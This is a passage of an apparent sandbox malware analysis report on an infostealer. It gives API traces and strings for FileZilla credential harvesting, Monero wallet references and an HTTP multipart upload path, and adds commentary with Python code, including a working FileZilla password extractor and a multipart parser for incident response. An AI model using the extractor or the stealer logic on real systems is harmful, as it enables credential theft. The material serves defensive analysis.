                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 090a4fdf8302d7acddd908eb3e543b9805888f7b16fd88e41f00bf92acfae766
                          • Instruction ID: 24ced8d789901eebf03632b02634038c9f693f21a93470150ac21d3261ca3784
                          • Opcode Fuzzy Hash: 090a4fdf8302d7acddd908eb3e543b9805888f7b16fd88e41f00bf92acfae766
                          • Instruction Fuzzy Hash: 80516AF3A083044FF3086F29EC5577AB3D5EB90320F2A463DDA8997780F97E68058246
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e203f81b10b3f2e986dc6414f7d2b32159e8e9c77a3a500965a11bd25a2cea37
                          • Instruction ID: b66bc3d97674733041ba43f7b3a6ba0de7aa52e3338f410db9b88cbad7abf98c
                          • Opcode Fuzzy Hash: e203f81b10b3f2e986dc6414f7d2b32159e8e9c77a3a500965a11bd25a2cea37
                          • Instruction Fuzzy Hash: DD31B3F3E452104BF305692DDC4576AB6CAABD4720F1B823D9E98973C5ED7D5C064182
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00180DBA,00180DB7,00180DB6,00180DB3), ref: 00170362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00170369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00170385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 001703CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 001703DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00170419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00170463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 00170532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00170562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00170571
                          • lstrcat.KERNEL32(?,url: ), ref: 00170580
                          • lstrcat.KERNEL32(?,00000000), ref: 00170593
                          • lstrcat.KERNEL32(?,00181678), ref: 001705A2
                          • lstrcat.KERNEL32(?,00000000), ref: 001705B5
                          • lstrcat.KERNEL32(?,0018167C), ref: 001705C4
                          • lstrcat.KERNEL32(?,login: ), ref: 001705D3
                          • lstrcat.KERNEL32(?,00000000), ref: 001705E6
                          • lstrcat.KERNEL32(?,00181688), ref: 001705F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00170604
                          • lstrcat.KERNEL32(?,00000000), ref: 00170617
                          • lstrcat.KERNEL32(?,00181698), ref: 00170626
                          • lstrcat.KERNEL32(?,0018169C), ref: 00170635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00180DB2), ref: 0017068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: b214110228dbca203a309b61eebd45cb1723063bf037ed9d95bb9ed24b9b60ba
                          • Instruction ID: d467b5e079ec2aa4bd60cc172cb4b10300d9cf40ac3812915e0c3fd672ead610
                          • Opcode Fuzzy Hash: b214110228dbca203a309b61eebd45cb1723063bf037ed9d95bb9ed24b9b60ba
                          • Instruction Fuzzy Hash: 20D13372900108ABCB05FBF4DD96DEE773CAF69301F908518F106A7095EF75AA46CB62
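                           What the function above does, read from its API and string lists: it locates the FileZilla session store (\AppData\Roaming\FileZilla\recentservers.xml), pulls the text following the <Host>, <Port>, <User> and <Pass encoding="base64"> tags with StrStrA, and concatenates a "browser: FileZilla / profile: null / url: / login: / password:" record into a heap buffer obtained from GetProcessHeap/RtlAllocateHeap. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It re-implements that extraction over a constructed recentservers.xml so the exposure is visible on sample data, and adds an accounts_to_rotate helper an incident responder can run against a copy of a victim's file. Two points are inferred rather than shown by the report and are marked as assumptions in the code: that the sample base64-decodes the <Pass> value after locating the tag (FileZilla stores it base64-encoded), and that the unresolved separator strings passed to lstrcat (00181678, 0018167C, ...) are a ':' between host and port and line breaks.

```python
"""Added example for this report, not code from the sample or from Joe Sandbox:
the FileZilla recentservers.xml harvesting step of the function above,
re-implemented in Python over a constructed input."""
from __future__ import annotations

import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed stand-in for %USERPROFILE%\AppData\Roaming\FileZilla\recentservers.xml.
# Hosts, user names and the password are invented for the demonstration.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>1</Logontype>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Logontype>0</Logontype>
      <User>backup</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def harvest_filezilla(xml_text: str) -> list[dict]:
    """Return one record per <Server> with the four fields the sample pulls out.

    The sample finds the tags with StrStrA; here a real XML parser is used, and the
    base64 <Pass> is decoded (assumption: the sample decodes it after locating the
    tag; the report only shows the search).  A missing or malformed <Pass> gives an
    empty password instead of an exception so one bad entry does not hide the rest.
    """
    root = ET.fromstring(xml_text)
    records = []
    for server in root.iter("Server"):
        password = ""
        pass_el = server.find("Pass")
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                try:
                    raw = base64.b64decode(pass_el.text, validate=True)
                    password = raw.decode("utf-8", "replace")
                except binascii.Error:
                    password = ""
            else:
                password = pass_el.text
        records.append({
            "host": server.findtext("Host", default=""),
            "port": server.findtext("Port", default=""),
            "user": server.findtext("User", default=""),
            "password": password,
        })
    return records


def format_record(rec: dict) -> str:
    """Lay a record out the way the function's lstrcat chain does.

    The literal labels are the ones in the report; the ':' between host and port
    and the line breaks stand in for the unresolved separator strings (00181678,
    0018167C, ...), so the exact byte layout is an assumption.
    """
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n"
    )


def accounts_to_rotate(xml_text: str) -> list[str]:
    """Incident-response helper: every account whose password was on disk and is
    therefore in the stealer's log.  Entries with no stored password (anonymous
    or ask-for-password logons) are not listed."""
    return [
        f"{r['user']}@{r['host']}:{r['port']}"
        for r in harvest_filezilla(xml_text)
        if r["password"]
    ]


if __name__ == "__main__":
    for rec in harvest_filezilla(SAMPLE_RECENTSERVERS_XML):
        print(format_record(rec))
    print("rotate:", accounts_to_rotate(SAMPLE_RECENTSERVERS_XML))
```

                           Run it on a real file with harvest_filezilla(open(path, encoding="utf-8").read()). The practical consequence for response is the accounts_to_rotate list: any server whose <Pass> was stored is compromised once this sample ran under the user, regardless of whether the exfiltration request later succeeded.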
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001659F8
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00165A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00165B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00CCFB88,00000000,?,00CCEDD0,00000000,?,00181A1C), ref: 00165E71
                          • lstrlen.KERNEL32(00000000), ref: 00165E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00165E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00165E9A
                          • lstrlen.KERNEL32(00000000), ref: 00165EAF
                          • lstrlen.KERNEL32(00000000), ref: 00165ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00165EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00165F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00165F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00165F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00165FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00165FBD
                          • HttpOpenRequestA.WININET(00000000,00CCFC08,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00165BF8
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • InternetCloseHandle.WININET(00000000), ref: 00165FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: d7069786f869b6f0d3299aa6737c572ab406074c4dcec50b4da5c0c5d59e385f
                          • Instruction ID: d1a8bab3aaad5e17b720a7bc63b8a371964e8ac3733efb18473b5fb64d2c9f10
                          • Opcode Fuzzy Hash: d7069786f869b6f0d3299aa6737c572ab406074c4dcec50b4da5c0c5d59e385f
                          • Instruction Fuzzy Hash: CA12E072860118ABDB15EBA0DC95FEEB37CBF64701F908199B11A63091DF702B49CF66
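                           The function above is the sample's upload path: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with dwFlags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), then HttpSendRequestA and InternetReadFile in 0xC7-byte reads of the response. The `"` and `------` strings it concatenates, together with the heap buffer it sizes from several lstrlen calls, are consistent with a multipart/form-data body (a delimiter line of dashes, quoted name= and filename= attributes); the report does not resolve the boundary or the field names. The Python below is an added example, not code from the sample or from Joe Sandbox: a small multipart parser an analyst can point at a request body carved from a capture to recover the uploaded parts, plus a decoder that names the bits of the WinINet flag value quoted above. The body it runs on is constructed; its boundary, field names and contents are invented for the demonstration.

```python
"""Added example for this report (not the sample's code): recover the parts of a
multipart/form-data upload body and name the WinINet dwFlags bits seen in the
trace."""
from __future__ import annotations

import re

# Constructed request body.  Boundary, field names and contents are invented and
# are not taken from the sample; only the shape (dash delimiter, quoted
# attributes, CRLF framing) is what such an upload looks like on the wire.
SAMPLE_BODY = (
    b"------7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"0A1B2C3D\r\n"
    b"------7MA4YWxkTrZu0gW\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"browser: FileZilla\nprofile: null\nurl: ftp.example.test:21\n"
    b"login: deploy\npassword: hunter2\n"
    b"\r\n"
    b"------7MA4YWxkTrZu0gW--\r\n"
)

_PARAM_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_multipart(body: bytes) -> list[dict]:
    """Split a multipart/form-data body into parts.

    The delimiter is taken from the first line ("--" + boundary), so the
    Content-Type header is not needed; that is the usual situation when only the
    body was carved from a capture.  Returns dicts with name, filename,
    content_type and data.  Raises ValueError if the body does not start with a
    delimiter line or the closing delimiter is missing (truncated capture).
    """
    eol = body.find(b"\r\n")
    if eol < 0 or not body.startswith(b"--"):
        raise ValueError("body does not start with a multipart delimiter line")
    delimiter = body[:eol]
    parts: list[dict] = []
    closed = False
    for seg in body.split(delimiter)[1:]:      # [0] is the (empty) preamble
        if seg.startswith(b"--"):              # "--boundary--": end of body
            closed = True
            break
        if not seg.startswith(b"\r\n"):
            raise ValueError("delimiter line not terminated by CRLF")
        head, sep, data = seg[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part has no blank line between headers and data")
        part = {
            "name": None,
            "filename": None,
            "content_type": None,
            # the CRLF before the next delimiter belongs to the framing, not the data
            "data": data[:-2] if data.endswith(b"\r\n") else data,
        }
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            key, value = key.strip().lower(), value.strip()
            if key == "content-disposition":
                for pname, pval in _PARAM_RE.findall(value):
                    if pname in ("name", "filename"):
                        part[pname] = pval
            elif key == "content-type":
                part["content_type"] = value
        parts.append(part)
    if not closed:
        raise ValueError("closing delimiter missing (truncated capture?)")
    return parts


# HttpOpenRequest dwFlags bits, values as defined in wininet.h.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


def decode_internet_flags(value: int) -> list[str]:
    """Name the bits set in a WinINet dwFlags value; bits not in the table above
    are returned as one hex remainder so nothing is silently dropped."""
    names = [name for bit, name in INTERNET_FLAGS.items() if value & bit]
    known_mask = 0
    for bit in INTERNET_FLAGS:
        known_mask |= bit
    rest = value & ~known_mask & 0xFFFFFFFF
    if rest:
        names.append(hex(rest))
    return names


if __name__ == "__main__":
    print(decode_internet_flags(0x00400100))
    for p in parse_multipart(SAMPLE_BODY):
        print(p["name"], p["filename"], p["content_type"], len(p["data"]), "bytes")
```

                           On a real capture, export the POST body with the TCP stream intact (the CRLF framing must survive) and pass the bytes straight in; the parts with a filename are the archive or text files the stealer assembled on the host, and the bare fields are the identifiers it sends with them. Absence of INTERNET_FLAG_SECURE in the flags is worth noting separately: with that bit clear the request goes out as plain HTTP unless the URL scheme forces TLS, so the full body is recoverable from a network capture.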
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0016D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0016D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D208
                          • lstrcat.KERNEL32(?,00181478), ref: 0016D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D22A
                          • lstrcat.KERNEL32(?,0018147C), ref: 0016D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D24C
                          • lstrcat.KERNEL32(?,00181480), ref: 0016D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D26E
                          • lstrcat.KERNEL32(?,00181484), ref: 0016D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D290
                          • lstrcat.KERNEL32(?,00181488), ref: 0016D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D2B2
                          • lstrcat.KERNEL32(?,0018148C), ref: 0016D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0016D2D4
                          • lstrcat.KERNEL32(?,00181490), ref: 0016D2E3
                            • Part of subcall function 0017A820: lstrlen.KERNEL32(00164F05,?,?,00164F05,00180DDE), ref: 0017A82B
                            • Part of subcall function 0017A820: lstrcpy.KERNEL32(00180DDE,00000000), ref: 0017A885
                          • lstrlen.KERNEL32(?), ref: 0016D32A
                          • lstrlen.KERNEL32(?), ref: 0016D339
                            • Part of subcall function 0017AA70: StrCmpCA.SHLWAPI(00CC9428,0016A7A7,?,0016A7A7,00CC9428), ref: 0017AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0016D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
